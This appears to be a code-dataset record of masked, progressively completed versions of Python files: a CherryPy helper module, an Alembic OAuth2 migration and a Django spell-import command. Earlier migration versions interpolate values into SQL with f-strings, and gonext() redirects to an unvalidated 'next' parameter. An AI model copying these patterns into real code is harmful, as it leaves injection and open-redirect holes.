newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n for k, v in kwargs.iteritems():\n if k[:3] != 'new':\n continue\n k = k[3:]\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n if len(args) > 0 and args[0] == 'static':\n return config.STATIC_ASSETS_URL + '/'.join(args[1:])\n return cherrypy.url(routes.url_for(*args, **newkwargs))\n\n\ndef queryparams(*args, **kwargs):\n \"\"\"Encode a set of arguments as query parameters.\n\n \"\"\"\n args = dict(args)\n args.update(kwargs)\n return urllib.urlencode(args)\n\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked 
while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\n\ndef get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\n\ndef listify(val):\n \"\"\"Convert a value, as found in cherrypy parameters, into a list.\n\n \"\"\"\n if isinstance(val, basestring):\n return [val]\n if hasattr(val, '__iter__'):\n return list(val)\n return [val]\n\n\ndef listify_values(params):\n \"\"\"Return a copy of a dict with values which were strings converted to\n lists.\n\n \"\"\"\n return dict((k, listify(v)) for k, v in params.iteritems())\n\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return v[0]\n return default\n\n\ndef getintparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single integer item, or None if\n not supplied. 
If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return int(v[0])\n return default\n\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get('new' + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get('old' + name, None)\n if v is None:\n return default\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = json.dumps(value),\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\n\ndef slugify(value):\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\\\w\\\\s\\\\.-]', '_', value).strip().lower())\n return re.sub('[-\\\\s]+', '-', value)\n",
"step-5": "import cherrypy\nimport config\ntry:\n from simplejson import json\nexcept ImportError:\n import json\nimport routes\nimport urllib\nimport re\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if \"GET\" in allowed_methods:\n if \"HEAD\" not in allowed_methods:\n allowed_methods.append(\"HEAD\")\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = \", \".join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\ndef url(*args, **kwargs):\n \"\"\"Get the url for a given route.\n\n \"\"\"\n if len(args) == 0 and len(kwargs) == 0:\n return cherrypy.url()\n # First read the old args\n newkwargs = dict(\n (k, v[3:]) for (k, v) in kwargs.iteritems()\n if v is not None and k.startswith('old')\n )\n # Apply neither new nor old args\n for (k, v) in kwargs.iteritems():\n if k.startswith('new') or k.startswith('old'):\n continue\n if v is None:\n try:\n del newkwargs[k]\n except KeyError: pass\n else:\n newkwargs[k] = v\n # Apply new args\n for (k, v) in kwargs.iteritems():\n if k[:3] != 'new':\n continue\n k = k[3:]\n if v is None:\n try:\n del newkwargs[k]\n except KeyError: pass\n else:\n newkwargs[k] = v\n if len(args) > 0 and args[0] == 'static':\n return config.STATIC_ASSETS_URL + '/'.join(args[1:])\n return cherrypy.url(routes.url_for(*args, **newkwargs))\n\ndef queryparams(*args, **kwargs):\n \"\"\"Encode a set of arguments as query parameters.\n\n \"\"\"\n args = dict(args)\n args.update(kwargs)\n return urllib.urlencode(args)\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise 
cherrypy.NotFound\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\ndef get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\ndef listify(val):\n \"\"\"Convert a value, as found in cherrypy parameters, into a list.\n\n \"\"\"\n if isinstance(val, basestring):\n return [val]\n if hasattr(val, '__iter__'):\n return list(val)\n return [val]\n\ndef listify_values(params):\n \"\"\"Return a copy of a dict with values which were strings converted to\n lists.\n\n \"\"\"\n return dict((k, listify(v)) for (k, v) in params.iteritems())\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0: return v[0]\n return default\n\ndef getintparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single integer item, or None if\n not supplied. 
If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0: return int(v[0])\n return default\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get(\"new\" + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get(\"old\" + name, None)\n\n if v is None:\n return default\n\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = (json.dumps(value),)\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\ndef slugify(value):\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\w\\s\\.-]', '_', value).strip().lower())\n return re.sub('[-\\s]+', '-', value)\n",
"step-ids": [
11,
13,
16,
19,
20
]
}
|
[
11,
13,
16,
19,
20
] |
<|reserved_special_token_0|>
def upgrade():
bind = op.get_bind()
urls = bind.execute(
'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
)
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
nullable=True))
for url in urls:
bind.execute(
f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}"
)
bind.execute(
"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
)
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def upgrade():
bind = op.get_bind()
urls = bind.execute(
'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
)
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
nullable=True))
for url in urls:
bind.execute(
f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}"
)
bind.execute(
"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
)
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
def downgrade():
op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')
op.drop_column('oauth2_identity_provider', 'uri')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
revision = '52561c782d96'
down_revision = 'cdf9f34b764c'
branch_labels = None
depends_on = None
def upgrade():
bind = op.get_bind()
urls = bind.execute(
'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
)
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
nullable=True))
for url in urls:
bind.execute(
f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}"
)
bind.execute(
"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
)
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
def downgrade():
op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')
op.drop_column('oauth2_identity_provider', 'uri')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from alembic import op
import sqlalchemy as sa
revision = '52561c782d96'
down_revision = 'cdf9f34b764c'
branch_labels = None
depends_on = None
def upgrade():
bind = op.get_bind()
urls = bind.execute(
'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
)
op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
nullable=True))
for url in urls:
bind.execute(
f"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}"
)
bind.execute(
"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
)
op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
def downgrade():
op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')
op.drop_column('oauth2_identity_provider', 'uri')
<|reserved_special_token_1|>
"""Add uri on identity provider
Revision ID: 52561c782d96
Revises: cdf9f34b764c
Create Date: 2022-03-11 10:16:39.583434
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '52561c782d96'
down_revision = 'cdf9f34b764c'
branch_labels = None
depends_on = None
def upgrade():
    """Add a mandatory, unique ``uri`` column to oauth2_identity_provider.

    Existing rows are backfilled with the URI of their linked API resource;
    the GitHub provider is then patched to its well-known base URI before the
    NOT NULL and UNIQUE constraints are applied.
    """
    bind = op.get_bind()
    # Collect the API resource URI currently linked to each provider.
    urls = bind.execute(
        'SELECT p.id as pid, r.id as rid, r.uri as uri '
        'FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'
    )
    # Add the column as nullable first so existing rows remain valid.
    op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),
                                                        nullable=True))
    # Backfill with bound parameters: the URI values come from the database
    # and must not be spliced into the SQL text (quoting/injection hazard
    # with the previous f-string interpolation).
    update_stmt = sa.text(
        'UPDATE oauth2_identity_provider SET uri = :uri WHERE id = :pid'
    )
    for url in urls:
        bind.execute(update_stmt, {'uri': url[2], 'pid': url[0]})
    # GitHub's API resource URI is not its identity URI; patch it explicitly.
    bind.execute(
        "UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'"
    )
    # Every row now has a value: enforce NOT NULL and uniqueness.
    op.alter_column('oauth2_identity_provider', 'uri', nullable=False)
    op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])
def downgrade():
    """Remove the ``uri`` column and its unique constraint again."""
    # remove URI: drop the constraint before the column it depends on.
    # NOTE(review): passing None as the constraint name assumes a naming
    # convention is configured for this MetaData -- confirm before running
    # on backends that require an explicit constraint name.
    op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')
    op.drop_column('oauth2_identity_provider', 'uri')
|
flexible
|
{
"blob_id": "c185a88332e39c561649f087f01fd3b704e7010b",
"index": 1959,
"step-1": "<mask token>\n\n\ndef upgrade():\n bind = op.get_bind()\n urls = bind.execute(\n 'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'\n )\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),\n nullable=True))\n for url in urls:\n bind.execute(\n f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\"\n )\n bind.execute(\n \"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\"\n )\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef upgrade():\n bind = op.get_bind()\n urls = bind.execute(\n 'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'\n )\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),\n nullable=True))\n for url in urls:\n bind.execute(\n f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\"\n )\n bind.execute(\n \"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\"\n )\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\ndef downgrade():\n op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')\n op.drop_column('oauth2_identity_provider', 'uri')\n",
"step-3": "<mask token>\nrevision = '52561c782d96'\ndown_revision = 'cdf9f34b764c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n bind = op.get_bind()\n urls = bind.execute(\n 'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'\n )\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),\n nullable=True))\n for url in urls:\n bind.execute(\n f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\"\n )\n bind.execute(\n \"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\"\n )\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\ndef downgrade():\n op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')\n op.drop_column('oauth2_identity_provider', 'uri')\n",
"step-4": "<mask token>\nfrom alembic import op\nimport sqlalchemy as sa\nrevision = '52561c782d96'\ndown_revision = 'cdf9f34b764c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n bind = op.get_bind()\n urls = bind.execute(\n 'SELECT p.id as pid, r.id as rid, r.uri as uri FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id'\n )\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(),\n nullable=True))\n for url in urls:\n bind.execute(\n f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\"\n )\n bind.execute(\n \"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\"\n )\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\ndef downgrade():\n op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')\n op.drop_column('oauth2_identity_provider', 'uri')\n",
"step-5": "\"\"\"Add uri on identity provider\n\nRevision ID: 52561c782d96\nRevises: cdf9f34b764c\nCreate Date: 2022-03-11 10:16:39.583434\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '52561c782d96'\ndown_revision = 'cdf9f34b764c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n bind = op.get_bind()\n # get api urls\n urls = bind.execute(\"SELECT p.id as pid, r.id as rid, r.uri as uri \"\n \"FROM oauth2_identity_provider p JOIN resource r ON p.api_resource_id = r.id\")\n # add URI\n op.add_column('oauth2_identity_provider', sa.Column('uri', sa.String(), nullable=True))\n # set api_url as default URI\n for url in urls:\n bind.execute(f\"UPDATE oauth2_identity_provider SET uri = '{url[2]}' WHERE id = {url[0]}\")\n # patch Github URI\n bind.execute(\"UPDATE oauth2_identity_provider SET uri = 'https://github.com' WHERE name = 'github'\")\n # add constraints\n op.alter_column('oauth2_identity_provider', 'uri', nullable=False)\n op.create_unique_constraint(None, 'oauth2_identity_provider', ['uri'])\n\n\ndef downgrade():\n # remove URI\n op.drop_constraint(None, 'oauth2_identity_provider', type_='unique')\n op.drop_column('oauth2_identity_provider', 'uri')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# python imports
import re
# django imports
from django.core.management.base import BaseCommand
# module level imports
from utils.spells import SPELLS
from spells.models import Spell
# Canonical spell-school labels.  The mapping is an identity map; presumably
# it exists to whitelist/normalise the school values coming out of the raw
# spell data -- TODO confirm against utils.spells.
SPELL_SCHOOL = {
    'Abjuration': 'Abjuration',
    'Conjuration': 'Conjuration',
    'Divination': 'Divination',
    'Enchantment': 'Enchantment',
    'Evocation': 'Evocation',
    'Illusion': 'Illusion',
    'Necromancy': 'Necromancy',
    'Transmutation': 'Transmutation',
}
# Canonical casting-time labels (identity map).  Only the '1 Reaction' entry
# is referenced by the import command below; the rest document the accepted
# values.
CAST_TIME = {
    '1 Action': '1 Action',
    '1 Bonus Action': '1 Bonus Action',
    '1 Reaction': '1 Reaction',
    '1 Minute': '1 Minute',
    '10 Minutes': '10 Minutes',
    '1 Hour': '1 Hour',
    '8 Hours': '8 Hours',
    '12 Hours': '12 Hours',
    '24 Hours': '24 Hours',
    '1 Action or 8 Hours': '1 Action or 8 Hours',
}
# Maps the raw level value ('1'..'9', or 'Cantrip') to its display label.
SPELL_LEVELS = {
    'Cantrip': 'Cantrip',
    '1': '1st-level',
    '2': '2nd-level',
    '3': '3rd-level',
    '4': '4th-level',
    '5': '5th-level',
    '6': '6th-level',
    '7': '7th-level',
    '8': '8th-level',
    '9': '9th-level',
}
class Command(BaseCommand):
    """Command to populate the database with all spells for 5th Edition.

    Reads the raw spell dictionaries bundled in ``utils.spells.SPELLS`` and
    creates one ``Spell`` row per entry, normalising the loosely structured
    source data (classes, components, damage dice, level, school, timing).
    """

    # args
    help = 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'

    def handle(self, *args, **kwargs):
        """Entry point: import every spell in ``SPELLS`` into the database."""
        for spell in SPELLS:
            spell_entry = Spell.objects.create(
                name=spell['name'],
                distance=spell['range'],
                ritual=spell['ritual'],
            )
            self._set_classes(spell_entry, spell)
            self._set_components(spell_entry, spell)
            self._set_description(spell_entry, spell)
            self._set_level_and_school(spell_entry, spell)
            self._set_timing(spell_entry, spell)
            spell_entry.save()

    @staticmethod
    def _set_classes(spell_entry, spell):
        """Fill ``available_to`` from the spell's class list.

        Keeps the original formatting: multi-class lists are joined with
        (and end with) ', '.
        """
        classes = spell['classes']
        if len(classes) > 1:
            spell_entry.available_to = ''.join(c.title() + ', ' for c in classes)
        else:
            spell_entry.available_to = classes[0].title()

    @staticmethod
    def _set_components(spell_entry, spell):
        """Copy somatic/verbal/material flags and any required materials."""
        if 'components' not in spell:
            return
        components = spell['components']
        spell_entry.somatic = components['somatic']
        spell_entry.verbal = components['verbal']
        spell_entry.material = components['material']
        if spell_entry.material:
            # Same trailing-', ' format as available_to above.
            spell_entry.specific_materials = ''.join(
                material + ', ' for material in components['materials_needed'])

    @staticmethod
    def _set_description(spell_entry, spell):
        """Store the description and scrape dice/saving-throw info from it."""
        if 'description' not in spell:
            return
        description = spell['description']
        spell_entry.description = description
        # First damage roll mentioned, e.g. '8d6' -> number 8, size 6.
        dice_number = re.findall(r'\d+(?=d)', description)
        if dice_number:
            spell_entry.damage_dice_number = dice_number[0]
        dice_size = re.findall(r'(?<=d)\d+', description)
        if dice_size:
            spell_entry.damage_dice_size = dice_size[0]
        # 'Dexterity saving throw' -> 'DEX'; only stored when exactly one
        # saving-throw ability is mentioned.
        s_throw = re.findall(r'[A-Z]\w+(?= saving throw)', description)
        if len(s_throw) == 1:
            spell_entry.save_type = s_throw[0][:3].upper()

    @staticmethod
    def _set_level_and_school(spell_entry, spell):
        """Normalise spell level, optional higher-level text, and school."""
        if spell['level'] == 'cantrip':
            spell_entry.level = 'Cantrip'
        else:
            spell_entry.level = SPELL_LEVELS[spell['level']]
        if 'higher_levels' in spell:
            spell_entry.higher_level = spell['higher_levels']
        if 'school' in spell:
            spell_entry.school = SPELL_SCHOOL[spell['school'].title()]

    @staticmethod
    def _set_timing(spell_entry, spell):
        """Normalise casting time and split concentration out of duration."""
        if 'casting_time' in spell:
            if 'reaction' in spell['casting_time']:
                # Any casting time mentioning 'reaction' collapses to the
                # canonical '1 Reaction' label.
                spell_entry.cast_time = CAST_TIME['1 Reaction']
            else:
                spell_entry.cast_time = spell['casting_time'].title()
        if 'Concentration' in spell['duration']:
            spell_entry.concentration = True
            # Strip the leading 'Concentration, ' prefix (15 characters).
            spell_entry.duration = spell['duration'][15:].title()
        else:
            spell_entry.concentration = False
            spell_entry.duration = spell['duration']
|
normal
|
{
"blob_id": "010f78d952657b3d7c11fbf8e46912d0294f6cc1",
"index": 9103,
"step-1": "<mask token>\n\n\nclass Command(BaseCommand):\n <mask token>\n help = (\n 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n )\n\n def handle(self, *args, **kwargs):\n for spell in SPELLS:\n spell_entry = Spell.objects.create(name=spell['name'], distance\n =spell['range'], ritual=spell['ritual'])\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title(\n ) + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])\n ):\n spell_entry.specific_materials += spell['components'][\n 'materials_needed'][i] + ', '\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n dice_number = re.findall('\\\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n dice_size = re.findall('(?<=d)\\\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n s_throw = re.findall('[A-Z]\\\\w+(?= saving throw)', spell[\n 'description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n spell_entry.cast_time = CAST_TIME['1 Reaction']\n else:\n 
spell_entry.cast_time = spell['casting_time'].title()\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n spell_entry.save()\n",
"step-2": "<mask token>\n\n\nclass Command(BaseCommand):\n \"\"\"Command to populate the database with all spells for 5th Edition.\"\"\"\n help = (\n 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n )\n\n def handle(self, *args, **kwargs):\n for spell in SPELLS:\n spell_entry = Spell.objects.create(name=spell['name'], distance\n =spell['range'], ritual=spell['ritual'])\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title(\n ) + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])\n ):\n spell_entry.specific_materials += spell['components'][\n 'materials_needed'][i] + ', '\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n dice_number = re.findall('\\\\d+(?=d)', spell['description'])\n if len(dice_number) > 0:\n spell_entry.damage_dice_number = dice_number[0]\n dice_size = re.findall('(?<=d)\\\\d+', spell['description'])\n if len(dice_size) > 0:\n spell_entry.damage_dice_size = dice_size[0]\n s_throw = re.findall('[A-Z]\\\\w+(?= saving throw)', spell[\n 'description'])\n if len(s_throw) == 1:\n s_throw = s_throw[0][:3].upper()\n spell_entry.save_type = s_throw\n if spell['level'] == 'cantrip':\n spell_entry.level = 'Cantrip'\n else:\n spell_entry.level = SPELL_LEVELS[spell['level']]\n if 'higher_levels' in spell.keys():\n spell_entry.higher_level = spell['higher_levels']\n if 'school' in spell.keys():\n spell_entry.school = SPELL_SCHOOL[spell['school'].title()]\n if 'casting_time' in spell.keys():\n if 'reaction' in spell['casting_time']:\n 
spell_entry.cast_time = CAST_TIME['1 Reaction']\n else:\n spell_entry.cast_time = spell['casting_time'].title()\n if 'Concentration' in spell['duration']:\n spell_entry.concentration = True\n spell_entry.duration = spell['duration'][15:].title()\n else:\n spell_entry.concentration = False\n spell_entry.duration = spell['duration']\n spell_entry.save()\n",
"step-3": "<mask token>\nSPELL_SCHOOL = {'Abjuration': 'Abjuration', 'Conjuration': 'Conjuration',\n 'Divination': 'Divination', 'Enchantment': 'Enchantment', 'Evocation':\n 'Evocation', 'Illusion': 'Illusion', 'Necromancy': 'Necromancy',\n 'Transmutation': 'Transmutation'}\nCAST_TIME = {'1 Action': '1 Action', '1 Bonus Action': '1 Bonus Action',\n '1 Reaction': '1 Reaction', '1 Minute': '1 Minute', '10 Minutes':\n '10 Minutes', '1 Hour': '1 Hour', '8 Hours': '8 Hours', '12 Hours':\n '12 Hours', '24 Hours': '24 Hours', '1 Action or 8 Hours':\n '1 Action or 8 Hours'}\nSPELL_LEVELS = {'Cantrip': 'Cantrip', '1': '1st-level', '2': '2nd-level',\n '3': '3rd-level', '4': '4th-level', '5': '5th-level', '6': '6th-level',\n '7': '7th-level', '8': '8th-level', '9': '9th-level'}\n\n\nclass Command(BaseCommand):\n \"\"\"Command to populate the database with all spells for 5th Edition.\"\"\"\n help = (\n 'Will auto populate the database with all the Spells from 5th Edition Dungeons and Dragons.'\n )\n\n def handle(self, *args, **kwargs):\n for spell in SPELLS:\n spell_entry = Spell.objects.create(name=spell['name'], distance\n =spell['range'], ritual=spell['ritual'])\n if len(spell['classes']) > 1:\n spell_entry.available_to = ''\n for i in range(len(spell['classes'])):\n spell_entry.available_to += spell['classes'][i].title(\n ) + ', '\n else:\n spell_entry.available_to = spell['classes'][0].title()\n if 'components' in spell.keys():\n spell_entry.somatic = spell['components']['somatic']\n spell_entry.verbal = spell['components']['verbal']\n spell_entry.material = spell['components']['material']\n if spell_entry.material:\n spell_entry.specific_materials = ''\n for i in range(len(spell['components']['materials_needed'])\n ):\n spell_entry.specific_materials += spell['components'][\n 'materials_needed'][i] + ', '\n if 'description' in spell.keys():\n spell_entry.description = spell['description']\n dice_number = re.findall('\\\\d+(?=d)', spell['description'])\n if 
